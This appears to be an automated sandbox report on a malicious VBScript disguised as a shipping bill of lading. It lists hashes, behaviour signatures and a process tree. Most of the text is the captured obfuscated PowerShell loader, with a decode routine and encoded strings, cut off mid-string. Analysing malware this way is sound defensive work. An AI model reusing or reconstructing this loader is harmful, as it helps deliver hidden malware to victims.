e7a896d4450aa9218ba34fcaeb6a542837b6087ba16968ad870b73ae1d7b552e

Analysis

max time kernel
143s
max time network
125s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
14/02/2023, 14:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CMA-CGM-ORIGINAL-BL-MSKA3848577211.vbs
Size

512KB
MD5

9c521a937174b0166b39db97ea79a254
SHA1

b89633cbbd6bfb3cafc2c7b1824cf32c4671fdc2
SHA256

e7a896d4450aa9218ba34fcaeb6a542837b6087ba16968ad870b73ae1d7b552e
SHA512

1495d188f786bb29ce3aaca6e203f3b7c86790106243820a67591acb68c5a0222a512e1fc45cfd1b85c3c5a314b783f3da4301c78e8be1b465f63c8abbbc95f9
SSDEEP

12288:1nKPi06eJhmbSPqC7iDXXy1xGAj7Ka4BUPzCnT:1nRSdiW19qDT

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	2144	WScript.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4756	powershell.exe
4756	powershell.exe
3800	powershell.exe
3800	powershell.exe
3200	powershell.exe
3200	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4756	powershell.exe
Token: SeDebugPrivilege	3800	powershell.exe
Token: SeDebugPrivilege	3200	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2144 wrote to memory of 4756	2144	WScript.exe	82
PID 2144 wrote to memory of 4756	2144	WScript.exe	82
PID 4756 wrote to memory of 3800	4756	powershell.exe	84
PID 4756 wrote to memory of 3800	4756	powershell.exe	84
PID 4756 wrote to memory of 3800	4756	powershell.exe	84
PID 3800 wrote to memory of 3200	3800	powershell.exe	89
PID 3800 wrote to memory of 3200	3800	powershell.exe	89
PID 3800 wrote to memory of 3200	3800	powershell.exe	89

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\CMA-CGM-ORIGINAL-BL-MSKA3848577211.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2144
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tumultuous = """TeFMluSpnQucRktFriTeoLonAv JuHTyTOxBkv Ul{Ps Di Sk Hy MipTiaGrrMoaXamga(St[UnSbltCarViiHjnAmgSk]Sl`$CadMaoTilJokSahbraTrlGeeTesTr)Lu;No Tr Ri ta Op`$KaTOcoRunkoiSkcGekHuiunnBugTe4Ir9St Ou=Un DeNSieSiwVe-deOUdbCujUneSkcIntAn UrbHuyAhtkoeAn[Pi]Un dy(Hu`$BudStoDklvikIshViaOelRaedasFa.MoLUneSinBagBetbehRu Gy/Mo Ba2Ba)Sy;Mi Pa So Su StFDioNerVe(Ng`$FsBleeAesHeoEltBisHi=Be0Le;Ti Bl`$inBVeeAdsBroEstphsIn Af-BelVatHj Ry`$UddStoBelSpkLohflaSvlNaeOtssc.NaLSaeBrnSlgsltskhSk;Ek Di`$BoBVieRnsNooOmtSnsRe+Br=Ot2Sp)Ep{Tw Sk Sa De Da Da Ku sk Se`$PaTFuoWanMaiFrcRekRiiTrnNegIn4St9Sk[Mo`$BeBPeeSksStoSotPlsMo/Ta2St]ru Py=Fo St[BicfioBanBovBeeSkrFitIr]ta:De:CoTDeoKiBReylctVdefl(Ti`$BudProKolEnkUfhStaHjlTueDesAf.PlSAtuTrbEgsSttHarSpiAnnStgPy(As`$SeBBieIbsKroSptPasNs,ha Ab2Re)is,Me Ev1Ov6Al)ge;Cr Ma Pa`$EkTCioPonStiUncLykToiKanSygSp4Co9Hy[Be`$StBMaesosPloVetDesCo/Bo2Re]Te Do=Gl Ir(El`$InTUnoTenkaiKrcEikPhiFrnRugRe4Ac9Br[Op`$VaBomeDjsPioUvtPasEn/As2ce]Ef Di-GlbBrxProOorZo ro8Sa3Mu)Aa;Ov Hu ud Zy Be}Or Br[AfSSttSerBiiOvnCygne]Ra[vaSFoyPesPstSyeAcmLu.PyTHaeHuxNotBr.teEDinBacGaoTadreiFonIngko]Sy:Br:DeATaSClCDeIArIBi.NrGWiebetSeSDutFrrVeiArnChgre(ro`$ReTCioSanSaiGecPakGaiBrnCogAl4Ea9Se)Tv;re}Mu`$BeNAloouvSpaLutTriBuoBlnadeMinSpsAv0Ry=NaHEcTOvBBa Fo'Gy0sv0Sm2LuAPr2Gu0Fo2Ju7Ra3Se6Sk3HaESy7foDAf3Fo7Sy3WhFAr3AdFDo'Po;un`$KlNSkogevDoaFrtQuitioConWaeTynBosRa1Sm=LoHDeTMeBMa An'Ju1StETr3ToAWe3Fe0Bl2De1Sy3InCIm2Ud0St3DaCSk3Er5Ua2Kr7An7PrDUn0Co4Wa3CoANi3FoDPy6So0Bo6Da1Tr7ToDDa0Af6Sv3StDBl2Pu0Di3Di2Da3St5Po3Un6sc1BaDHe3Si2Un2Re7Ba3suAFo2An5No3ty6Cr1AmETh3Dr6Ot2Ka7My3OnBBl3FoCPu3Ka7Om2Ba0Al'Ov;un`$paNOpoNevflasotSiiKboCanPoeIsnDesMa2Ex=FeHHeTKaBRe Bi'Mo1Po4Pi3Sp6Dr2Un7Se0Be3Re2Re1Ku3TiCJe3De0Gl1El2To3Ot7Ln3Eu7Tr2Ka1An3Pr6Ud2Ud0Ud2Im0de'Co;De`$StNBooVrvSaaCotTriReoognBaehenGlsWh3My=kiHXaTPyBAd Vo'Wa0Gr0El2SpAAp2In0in2Fu7St3Ka6Sa3GrEsq7UdDDr0An1Cr2Un6We3ReDMo2Sj7En3HaASy3FrEOm3Do6Br7UnDFr1IcARe3TiDTr2Lg7Am3li6La2Ho1Fa3CeCAn2Re3Fi0St0Qu3Ta6Un2Ad1Ba2Fo5ho3SaAVi3Di0Ma3gl6Ju2Ma0Ad7LeDUn1PrBEv3tv2An3UnDAa3Ma7To3BrFCe3Co6Ac0De1Bo3Te6Ov3Fa5Ug'Re;So`$SkNUkoHevMaaCotSliRyoSankeedinAisTo4Su=SyHFrTHaBMo St'Ju2Br0Lu2Tu7Gi2Ch1En3MaAap3UnDFo3Qu4Fe'St;At`$SaNDroSlvYnaPotbiiDaoConEneUdnNesFi5Ef=StHNaTSnBIn au'Sc1Lo4Bl3ef6Un2as7Sk1StEGt3stCBe3Gr7Lo2Ur6Vg3DmFUn3Ra6Si1BoBIn3co2ap3VeDAf3Vi7Mo3LaFdi3Ma6In'Ni;Ji`$BrNUnokavBiaPhtSaiThoChnOpeFynTosJa6Me=VeHInTmaBgu Ga'He0Fo1Ga0Mu7Ce0Sn0Ma2Pe3Pe3Af6hr3Br0No3MoALi3Ls2Ou3MeFSi1NoDAn3En2El3SeEDi3Ta6Fu7ShFDe7Ul3Sk1ArBAa3TeASk3Be7As3gl6In1Ap1Ep2SuAFi0At0Op3MoASk3Le4Fa7TeFIn7Ci3Er0Pa3Ch2Si6Af3To1Sk3CaFUd3KoAKu3Fo0sk'Si;Ja`$RuNEnoAlvPiaAdtMaiauoEjnReeOunGasKn7Di=FiHUnTNiBTo Sn'Sy0Ga1Te2Un6Nr3SuDFo2Bo7Fu3PuANe3FuESk3Al6Ro7PoFBe7Se3No1ExEGo3Le2Rg3EuDTr3Tu2Ci3Pe4Pe3Fr6Fo3Ab7Ra'Un;Tr`$CaNHeoAfvDuaPitSaiSpoHanEneBrnresOp8Bo=mrHVeTKnBAn St'Sk0sw1mi3Ut6Op3Ha5Un3CoFre3Su6Ny3Ti0Om2Ed7Ss3ha6Si3Di7Sp1ru7Or3Fo6Af3AdFAl3Ho6Va3Af4lo3Bo2de2Ro7Tr3Aa6Su'Bo;Le`$NoNMuoGovulaSutJuiMeoDonIneAvnBisHj9Ny=EfHToTOvBIn Sl'Be1TaAFa3CaDBe1SaEHa3Dr6Bo3NeETa3ToCSp2Im1Ud2ToAdi1UnESu3PrCme3Ut7Oc2Sw6Bi3StFHa3He6Se'Be;Lu`$OrpInoMetCasBehatoUnoBotEn0Cl=ReHSeTgiBPu Sp'Pr1FoEAl2GlAGe1Pr7Di3St6Un3AnFal3Fr6Ve3Sc4Fr3hj2De2Om7Gr3Lu6Mu0St7Mo2SkASa2Sh3Li3Va6In'Mo;Tu`$BepMhokntbesouhDaoTaoLatSu1Ko=SpHBeTSvBFr be'Bi1Ba0Ca3InFSo3Re2Be2St0Mi2ha0hy7SaFVa7St3Ep0Tr3bl2Sk6Su3Em1St3EtFAf3BeAAl3Tr0No7LaFCo7Va3Un0Do0Sa3El6An3Lu2Fo3SiFIn3In6Sg3wi7Sn7DiFKr7Di3Do1gu2Pe3ScDCh2Le0Pr3FoAHa1Sa0Re3brFFo3Kl2Pe2Al0Eu2Me0Op7TuFUn7Wh3Mo1Op2Bo2Di6si2Sl7Ru3OmCSe1He0Me3WiFpr3St2Ko2Al0Di2ot0Ay'Sj;Re`$DepShoMotFisfohApoAcoUdtfo2Un=FoHGoTTiBUn Ri'fo1EkAIn3SoDOu2Be5la3FiCDa3As8Sk3Pe6Vi'Wh;ke`$RvpSqoHgtSasPuhUhoBloSmtSu3En=afHStTstBir Un'La0Fr3Il2Pi6Ec3Ur1Un3HuFTi3LiASl3Ov0Ke7UnFTh7Be3Sc1CoBDr3GaARg3Ad7Hy3Mo6Au1Fl1ha2mlADe0Ud0Do3rsAMe3Sa4Ca7BlFVa7Um3Nu1FlDCr3To6Eg2bo4Aa0No0Fa3crFJr3BaCNa2me7Ek7SeFSk7Sp3Br0Vu5Pe3FrAAf2tr1ci2Ti7As2Sa6Go3Pr2Ko3NuFEn'La;Ko`$GspWaoInthnsNehPeoIsoEptSu4An=EmHkoTPaBUn Sk'Gr0Au5Es3UnAUg2Fo1Co2Fi7Be2Sk6Ti3Fa2St3UdFDe1Va2Ul3BaFSt3TiFMu3UnCSp3Pe0To'Ta;So`$CupWioNitSssThhJeochooptTe5Ra=OpHInTPoBAf ud'Di3BiDBa2En7Ko3pu7Pi3SkFDi3WoFEi'My;Ir`$napOvoTrtScsPihFloReoRetli6Po=HeHGuTEsBCo Sv'Ob1jvDBr2Hy7Un0Sp3Te2Sh1Ag3MiCEf2Ho7Au3Me6kl3De0Hy2Di7Fe0Pr5Ld3ChAov2Hv1an2fr7De2Ud6En3Un2Fo3cuFTa1DiEGa3Ar6Mi3MeEPa3SaCTo2Se1Mi2DaAAr'In;Kv`$FopFooGftHesMahProdaokotPh7Le=FoHLiTReBsn Ko'Da1NeABe1Ma6Hy0NyBPu'Un;Ze`$PrpUnoNetPrsCahGeoMaoKatNi8Ar=AgHElTBaBIm kr'Me0TiFNa'Jo;Sp`$MyUSkpNolSaaBryNr=FrHFoTTaBLt Di'ch0Ud6Ma0Sa0Cl1Ig6He0Ta1Be6Po0Dv6rr1No'Co;Mu`$SaSUleFoptatPeeSntFatEreJusCa=GuHSeTUnBOt St'Fa1Hj0Fo3Re2Ca3HaFSn3HgFPr0Pl4Un3SkAbr3FiDPu3Ha7To3AfCde2Fo4Su0Bo3Un2St1Di3BeCEm3Ba0Sc1st2Ph'St;jefGruRinDocAatReiWhoApnDe FofAfkTapKr Tu{FoPSkaSyrCoaAnmZi Mi(Co`$FaVRiaNekColWoestnPtdHaearsMe,Il Ap`$GuOUnvCaeAnrBinGuaHytStnVaiNonTrgDisTusEutIneCedFaeDrrFlnnoePo)Po Em Dw An Pa Or;Sk`$obPRerMaoUtgGarSiaUnmBlmVaoMadOtuBrlNeeBorHo0Ro Ho=DuHbuTDiBBa Ps'Pr7Di7Di1Ro4Co2Un1De2Fl6Pr3Be4Kn2Ha1St2Ru6Co7Co3wr6SoEBa7Za3Le7MaBph0Yd8Sp1No2St2Fr3pr2Fi3Pe1Ch7Si3GrCSo3ExEAn3Se2Pu3SaAOd3UnDSe0hiEGa6De9Gr6Un9No1De0Sp2dr6St2Sy1ov2Pe1Ch3Ma6Af3FoDAn2Lo7Hu1Un7po3DiCEc3SeENe3Da2Si3FoASi3BjDSk7PrDIn1Hj4Ra3Sy6Ha2Pa7Fi1Ef2Vi2za0Pr2Si0Fi3Kn6He3GeESi3Ar1Te3BeFSm3amAEn3Ti6Tr2Ba0Us7PrBDi7RoAFa7Dr3Fl2EmFEm7lu3Id0re4Ba3ClBSt3Te6In2Sw1Mo3Va6Ne7ArERi1AcCMr3Me1Dr3ul9sa3Fl6Bi3Ib0Kr2Dr7er7Cy3Co2Sl8Pr7Mn3Op7Mo7Sy0CoCNa7SeDSk1do4Sl3SeFFa3StCLi3So1Le3Ba2Ov3afFTr1As2si2id0Li2Kl0Ki3Fo6Ge3SkEKe3Fo1Yv3PaFFi2StAVe1Re0Ha3Pa2Ma3Sk0Fi3lyBAm3Jg6Fr7Un3Re7HnEMe1Ti2En3DrDUd3De7Lr7Fr3St7Le7An0StCTr7SpDBa1EkFGr3KrCpr3Be0Ei3Br2Ub2Ha7Di3LuATa3OdCSu3foDMy7StDRe0Tr0Pe2uf3Te3MaFTe3KeANo2Pe7Ao7MiBAl7Fd7Tr2De3Pe3DiCCo2Se7Me2Ke0In3TrBDe3SyCFa3unCLa2Ea7Ko6KrBBe7DeAJo0Mi8Pa7MeEWo6Re2Fi0PeEPa7JuDAl1In6Un2Te2Ti2pi6Tu3Se2An3ChFUn2Pr0bl7SpBDi7Ti7Ps1SuDAt3PaCCr2Tu5Ko3Hj2Ve2Wi7Es3FlAOp3BoCLa3PaDSt3Av6Bo3CaDSt2Pj0Nu6sh3As7HoADu7Ek3Eu2beEFr7UdAEs7GaDSa1Lu4Ov3Sk6zu2Ne7St0Ro7Re2PsAFo2Ge3Fi3Pr6st7laBPu7Mi7De1BrDOr3SpCRe2Fo5Ap3Ve2ti2Ej7Ki3NyATi3AlCAi3UnDUn3Sp6Fa3seDJo2Su0Fo6Ru2Om7OpAAl'Re;Yo&Sk(Sp`$AspKnomotNosSkhUdoUaoArtGl7Ka)Na An`$LaPEfrBeoAngLrrStaScmUnmStoFrdHjuBolPreHyrPu0St;Sc`$GaPBorGloregMerCoaRimSimReoUmdOvuCalDoeForEn5Ty Lo=St UnHquTPrBIn Ja'Ta7Fr7Je1SuFCr2DuAfl3Fl8Qu3Fr8Et3Sa6Pr3fo7Pu2Bu1Ov3VaEUs7Ep3Un6InENa7Bl3Pa7In7Ha1Fr4Sw2Ty1Ge2Qu6Pa3Co4Su2Vi1Sp2Ad6Lg7loDIn1Tu4Fe3Fe6Hu2wi7Af1dyEAp3Ba6Wa2Bi7My3PeBUn3KoCDd3Ha7Fo7KoBBr7Di7Sm1AsDTr3AtCPo2Wa5Bi3Is2ba2An7un3PhASp3CyCEn3arDde3Ch6Fo3miDAm2Si0An6Fo1Ga7DoFva7Li3Ef0Fo8Fe0En7fa2caAho2Tr3Go3Ra6Gl0Un8Re0PoESp0BrESk7El3Ca1Wh3He7FoBEt7Ga7Un1ShDHi3trCUn2Al5Se3Ha2Ec2He7Al3BeASi3ViCSi3TaDGa3Af6Ti3VeDla2Ha0Go6Am0Ti7PeFUn7ko3Ga7Ho7Fr1SuDTa3AgCPl2Br5Sp3Tr2Re2Fa7Fr3DeASt3CyCTe3RaDTr3In6He3KrDSp2El0Pa6To7El7SpAAb7SaAUn'Be;to&Aa(Br`$DepReoFotafsGohEloEaoNdtgl7Vi)Hy Un`$MaPSurFooLogsyrClaGhmDemTroRedVaulolfoeEnrki5Be;Ca`$AlPThrPhoMagSjrRgaAcmBrmHaoSpdVeuUnlsteAurTe1Si Dr=St HoHFrTBiBLe No'Bi2Hy1Gt3sm6No2Na7Pr2ba6Tr2An1Fi3LeDhe7Ci3Sk7Ac7Ku1TiFOp2FrARh3Li8Li3On8lu3In6Pi3Di7De2Su1Em3AnEBe7SlDWe1PeATa3piDPa2Ee5Fr3StCEm3Zi8Fo3Va6Ko7OpBNe7Ba7No3SwDCr2La6Le3KrFNo3SoFaf7UoFSy7Be3Ba1Hv3Er7EkBop0Fe8Me0Ci0Un2PrANo2Th0Up2Me7Ha3Sc6Th3DeEra7WiDFn0Ho1su2Mi6Ly3NiDRe2Ku7Br3VaAPr3KaEAn3Kr6La7HeDTr1UnATu3GaDCa2Ri7Me3Gr6Ra2Hj1Wi3AnCSp2Dd3Se0Mi0To3Gr6Fo2Sn1Ma2Su5Re3SeAEl3Di0po3Pr6Su2Ox0No7SvDSh1DiBSc3Di2fl3DiDSu3Mu7Pa3ThFBl3ma6un0In1Gl3Pe6Ya3Ro5Pi0LyEHe7AnBLe1MeDLe3Sa6Un2Le4Aa7AnEbo1BlCPr3Th1Si3Bu9Ti3Af6Ta3Ca0hi2Su7Mo7pi3ep0Be0Co2DeAFr2Lu0Ud2Re7fy3Ex6Kb3ReEUd7paDPh0Ha1Un2Af6Pa3TeDAn2Pe7Pl3ImAFo3DaEUn3In6Po7PuDAf1BeAFr3IpDTe2Un7la3Se6Ud2Sh1Bi3SeChu2Ab3Un0Ce0Da3Ju6Ho2Ud1Br2Me5Ma3LoAfo3Pr0Gi3Br6Pr2Me0ir7SnDCr1KiBde3Cr2Wr3IbDOv3Re7Re3smFPu3Bi6Sl0lo1Ga3Sa6Tr3Ni5Fu7KeBSp7DiBFo1oyDGu3al6Di2Ou4Mo7AeEBi1SiCDi3Te1An3Er9Mo3Ol6in3Pt0Af2Mi7Em7Ko3ka1KbASp3BuDPe2Du7Ad0So3Ma2Sv7Lo2Im1Lg7stAst7SuFPi7So3Ka7EkBCo7Na7Tr1Be4Up2Co1co2De6In3me4Tr2no1Zi2Fu6Be7PeDHa1Sa4Mi3Ab6Fr2Sn7pr1RaEPo3Fl6Hu2Mo7La3BlBUn3urCLa3Af7Ov7TrBPh7An7Sc1HaDpt3EgCUr2Je5Ra3Ca2La2el7En3CoAas3PaCUd3reDBa3Un6Ru3InDDe2Pa0Ha6Ph6Eu7AsAFe7SiAJa7OpDte1UpATu3KeDSu2Sc5Ln3PrCLa3Fo8Sy3De6Di7DeBPe7Br7Cu3MuDRo2Mo6Pr3SiFTe3OrFOv7PuFCh7Al3Af1Af3Ra7TrBTo7Ko7Un0In5La3Hy2Fo3Pa8Br3HyFTa3Ef6Of3SyDIn3Va7Tv3Ki6ha2De0Ue7inASm7SkAFo7FoANe7ZiAAf7ShFTr7Ti3qu7Fo7ya1DuCGr2Cu5Rt3Ov6Ne2Oc1Pa3SoDNe3Ho2Sv2Af7Re3UdDLi3NoASa3SlDst3De4Do2Sn0un2In0Ln2ho7Su3Da6El3sp7No3Vr6Ri2An1In3ChDIn3Co6Sc7UdAEn7PoAUd'Fi;Pr&Gu(Ou`$PupHooArtLisAlhAmoNooAntNu7Ou)Re St`$InPDerSkoRegBrrTeaMamHamCooBrdspugalKueNorLs1Ad;Lu}TcfVeuOfnbocBotSiiHuoJanUd daGCaDBaTWa Me{SePFoaFlrMoaSkmPe Pl(Pl[FoPNyasurLuaSpmKaeCotBoeOvrGt(AbPTeoOvsfliTetAriStoconDu Va=St Se0In)ma]En Rk[JuTUbyMapKyeSu[ud]eg]In kl`$LutHaeSelEjeAsgSarSkaTemBebReuadrEkeCaaSauSyeBetSh,Kv[GePLiaunrJeaFomPreFjtUneAlrAn(epPUnoBesReirotToiwaoGenHa fi=Dr El1Sr)Ta]Ph Pr[AnTEnyRupNaeCr]Un Ov`$thHSurOpnziiHonNogSo Ga=Un ge[KoVBeoBaiindTs]St)er;Cy`$SkPAgrIwoSogPorTiaOpmPrmKooAfdKouTrlNoeKorOp2Ap Wi=In PuHVaTDaBSp Ge'Sp7Pi7Ri1No5ut2Ka1So3sk2Sk3ObDUn3fi8ch2VoACo7Ru3Sa6ViESp7Ba3Re0Wh8Ba1pi2Ge2Ud3Fo2Co3Fl1Hy7di3ZaCSc3DiETh3Pa2Un3ApABi3PaDGr0BlEFe6ap9Ud6Ud9Da1An0Sc2Ea6Mo2Sh1ad2Da1Ti3St6Sk3HoDCo2Cy7Sv1In7Co3SuCsp3sfEBa3mo2Ge3CoAAf3InDSo7VeDDo1sh7Sl3pa6Sk3Me5Fa3AtACa3RiDLa3Pr6Co1Hv7Tr2BaAGi3OpDSe3Pl2Fe3ReERa3ToAAn3Op0Pa1Fn2Ra2Pa0Or2Di0Ce3El6Ev3ToEte3Bl1Ga3SkFfo2BaAUn7EcBSk7GoBUn1NoDTo3Va6Un2Fa4Af7AuESu1RaCby3Ma1Im3Fl9Fo3Se6Ex3Un0Dy2Sk7De7To3Ex0ko0pa2diAMe2Ha0Be2So7Du3Pr6An3BeEHu7BrDBa0Eu1Or3Sc6Se3La5Om3ExFFo3Co6co3Su0Fe2He7Tr3UnAFo3OcCEm3RyDLa7MeDTu1Sh2Al2Un0De2Sr0Ca3Bl6So3MoEGa3An1Tu3EsFIn2RgATo1WiDMe3He2St3StECy3Ma6Es7MoBTe7Fd7fi1RhDGo3PtCEe2Du5sk3Br2Fo2To7Fi3RaAFa3RcCfr3ocDDi3Ch6Ge3TrDVa2Be0Sp6SoBHi7StASu7StABa7UdFVo7Tu3Ad0Ma8Ma0Su0in2BuACh2Pr0Mu2Cy7Mi3Pr6Gu3LyECh7SkDEn0Fr1so3Dr6gu3Te5Ta3HnFBr3No6Be3Au0pa2Fi7Hu3KoATh3OpCCh3IbDFj7NoDAb1Hi6Fi3DeEJu3HuAHa2Am7Pe7BeDTr1De2Un2Ud0He2su0Je3Un6Fi3ArEKe3Bl1Sa3CoFTy2FlANe1Sr1Kl2Al6Be3AcAPa3TiFMa3Su7St3Ve6Ka2An1Ta1Im2Re3Lu0Pi3St0St3Ru6Ko2Ch0Co2An0Su0GiEEx6Ho9Re6Eg9Re0Ri1Un2gl6Un3TaDFu7usAga7CaDSa1Su7Ge3an6Ta3Ba5So3UnATr3OrDFd3Ux6Kr1Ne7Es2UnAGa3BuDKr3ts2Jo3TeEPr3WeAno3Sp0su1SpEVa3ChCTo3Sn7Mn2Ro6Ci3ErFdy3Po6Sc7KoBTy7Kv7ou1PeDPa3ObCBa2Ge5un3La2Ul2Po7Fo3diAPr3SpCId3CoDWr3De6Ov3NdDRe2Ti0Si6reATh7DeFEu7Da3An7Ou7Un3De5Fi3Vi2Vo3ArFLs2fr0Ka3Tr6He7KoABa7reDTr1Po7Di3bu6La3Ud5Co3LaAUn3TwDRe3Sa6Ar0el7De2FiAba2Pl3lu3Dr6Fo7NaBVi7st7Ud2Ch3Fo3RrCPi2Ly7Ve2Pl0Hi3MiBNa3VaCdu3StCKi2Se7Fd6Ap3Co7BrFti7Sn3Su7Ko7Un2co3Ka3PhCIs2Ba7pr2Mo0Ba3chBFu3BeCSn3ChCNa2To7su6Ku2Ge7SpFla7Pr3Ov0Hs8Bl0re0Yn2SuAHj2Dy0hu2La7Su3Re6Vd3MoEGu7HiDLe1AnEWh2Kn6Ma3CrFCh2Fo7Ge3EuAOx3Ta0Or3Ca2La2Re0Al2Ur7Ho1My7tr3Fu6Mi3PlFUd3Co6ud3Di4Ex3Ov2Sv2Aa7Pe3Ud6po0diEPr7CeABa'Re;Sl&Ex(Ti`$OrpSloSttVasEnhCooTrosttTr7En)sp In`$SrPderHuoEggAfrGlainmWamBioTadPauSilBeeStrUl2Ha;Re`$AaPForGeoPagLirSeaOrmInmTeoPadNiuAllKaeSerAq3Tr Un=Hv TaHPlTLeBLi No'Ej7di7Un1Bl5Ve2Ma1He3Ka2Ve3ToDPh3Ra8Co2TaAAn7UnDVe1ty7Ef3Di6Va3In5ho3HaAEd3SmDAg3Pu6Gl1ga0Su3GlCEx3HaDFi2Dr0Op2Bo7Kl2in1Le2In6Ol3lo0va2La7Bg3MaCRi2Si1Sl7OvBFr7Me7Un1NeDUn3arCSo2Eu5ko3Ki2Pa2St7Lu3NoASo3AnCPe3inDJu3Ov6Ba3SeDIb2Uv0Wr6Di5Pr7MeFFo7Sk3Li0Co8Sh0ab0wo2KoASn2de0in2Re7Sa3Ga6Re3SkERu7VdDFo0An1co3Di6Ch3Al5Ly3PnFTv3Be6Ud3Re0No2No7Gr3UnAbe3TeCSk3KaDDe7DiDNe1fe0Ac3Ca2Ki3ReFCh3NiFSc3VaACo3RaDSn3Ud4Ma1St0Af3SeCpy3VgDPa2un5Bu3gr6St3BrDSe2Sj7se3StATr3LaCOn3AtDPa2Ly0Se0JeEHe6Wh9Pl6El9Pi0Bo0Ra2Mu7Ma3ki2Do3SaDB 3sl7Tv3Sp2Un2In1ba3De7Kv7inFln7Sv3Eq7Fo7Bi2Im7ud3Jo6Co3DeFTi3so6th3cu4Du2Sc1Bl3Re2Bu3NiEto3Te1Dy2Re6Do2No1Is3Gi6Aa3Me2Fo2Co6Ju3Pr6rh2Fa7Sa7DeALa7ApDFd0St0Ha3Ra6Di2Ma7Ba1AfADr3GaEBe2Pr3El3BaFCa3Be6Le3LeEPr3Si6St3doDRe2Dm7Mo3No2He2Pa7Af3SuANi3coCMi3UnDbo1De5In3AlFia3As2El3Au4Pa2Fe0Im7KlBcy7Es7Di1VeDSe3RaCFi2An5Ri3Pe2Fa2Gr7My3ErAAf3noCSw3epDti3Mi6Br3HeDFr2Lm0Qu6Se4Te7ArATo'Fe;Un&Ca(Un`$FiprioFitVisEshSeoTeoantBa7Mi)il Fi`$DoPDerFooRagPrrSoaSnmNomLioStdHuucolMieFrrDa3Lu;Ha`$PrPUnrReoCogKarEpaMamMomNooDidHiuEalTaePorHc4To Fi=Vi WoHMaTMeBRe Ac'Jo7Dy7Pr1do5Ps2An1Re3Wo2Tj3UdDTj3St8So2SpASt7GyDTa1Un7Ra3Fi6In3Fa5Va3AlAci3FoDud3Pa6Un1DiERu3fi6Br2He7Pr3UdBMe3OuCop3Hu7St7deBBe7An7Re2Gt3Be3MaCAn2Ba7No2De0Sa3MeBMi3NeCSt3DoCFo2Am7ot6lu1Dt7JaFTi7Wo3Fl7Fo7St2be3Wh3VaCPo2Ho7Bo2Cu0Vo3LoBMa3AgCSc3PaCMa2Va7Re6Ch0Br7NoFou7Bo3Cr7bl7Hj1OpBHj2Ge1no3PeDKi3foASt3ShDOv3Sj4Ma7HoFTi7we3Ly7op7Fu2Th7Ob3Sc6Ob3PoFOv3Pr6Wi3Re4Na2Ca1al3So2Be3anESo3Su1Kr2Ur6Ov2Ma1Na3Ku6Dr3Fl2St2At6Co3Te6Pr2Ax7ly7reAFi7FrDRe0No0Ge3Le6La2pr7Va1TrAAn3DiEEn2Fu3Ce3UnFTi3Rr6Fa3TjEVa3Be6Re3DuDup2Dr7Ga3In2Pr2Su7Pe3SuAsk3coCCo3StDSp1In5Fo3DbFDr3Bo2In3Di4Sv2Un0Co7OlBFr7sc7Ke1DjDCr3FoCOv2St5Pi3Pr2lo2Re7Wi3ArAOp3JaCAf3ArDUp3Ti6Ho3PsDBo2Ph0Ai6He4kr7blAOp'Br;Pr&Fe(Gl`$CepCioIltMysTrhProstoDetMa7Im)We Im`$OvPForGioFegLarSpathmAcmOpoFodCouPilMeeVarSe4Ps;ap`$FrPTarStoShgFarFraMimLtmseoOddjuuAclSaeInrfe5Un Fo=Ba irHHaTReBFl mo'To2Pl1Pa3Ba6Se2Br7Re2Ek6Ok2Lu1Hu3NoDSy7Ce3Kr7Af7Bo1ad5In2Ha1Ho3De2Un3StDap3Te8Ha2ApAMu7DeDVi1Es0St2Un1Ir3Fo6Jo3ge2Ge2Nu7Di3Ru6Do0No7Be2ToAHo2Tr3Ek3Ca6An7ToBTj7UnAFe'Ta;Je&pr(Ka`$PypSaoRetGisMahSaoWioAdtNe7Ny)Ly Ek`$EpPTarGeoSogAfrOuaDdmHumLioStdPeuTrlPoeUnrBo5Do Fe be Ex;Bi}Sq`$OpUPrdSopPaaTenRstUnnGoiVanPogNesIdfGyoCorHarPaeMotRinAbinonFigCoeKwrDenMieUnsFi It=Dr KuHNoTMlBSk Ty'Ho3Br8Re3To6He2Ve1Fa3LiDUn3Pe6Mi3JoFCo6Sh0Ko6Co1Sv'St;Ai`$NoPSirOvoAkgInrElaskmPrmLioUndUruVilStePurEm6Tr Im=Mi ThHCaTSpBMe Mo'Ga7Fr7Zo0Ga0Sc2Se3bo2Sw1Fr3Ca8Sy3Um8Ko3St6Th3Ch7An3Ge2Ov3AmFIn3bl6Co3LdDSt3fo6Ex2Fr0me7Ly3In6ObECo7Ta3un0Kl8Pa0Sk0Bo2AcADi2Al0Af2Af7Ge3Pl6Do3HeECa7FlDSo0ba1Et2Gl6re3SpDTh2Fo7Ja3LiAEl3DeETh3de6Un7SvDLi1VaABe3SeDVe2Ho7Co3Ga6Ka2Po1Ro3BaCFo2Am3Be0Ka0ab3Ad6Sk2Nu1Ma2Pa5re3StABi3Dr0Hr3To6Qu2Mo0Ps7InDva1crECy3Si2Ha2Be1Un2Mi0no3StBth3Sl2Pr3KlFNe0AcEda6Ta9Fo6Fd9Us1un4Tr3Do6Te2Sr7De1Co7Rh3Su6So3AdFCu3Be6Pa3Id4sp3so2Us2To7Mi3An6Me1Ja5Ra3NuCUn2Ap1Tr1Ba5Re2im6Ta3EfDVl3Ge0En2Me7Da3lsATy3LeCAn3TrDPo0Af3Be3KiCIn3HyAAn3InDsi2un7Vv3Sk6Fe2Tw1Bo7FuBdj7SyBFi3Ha5me3Ra8He2Mo3Te7Mi3Ur7Yd7Ex0Un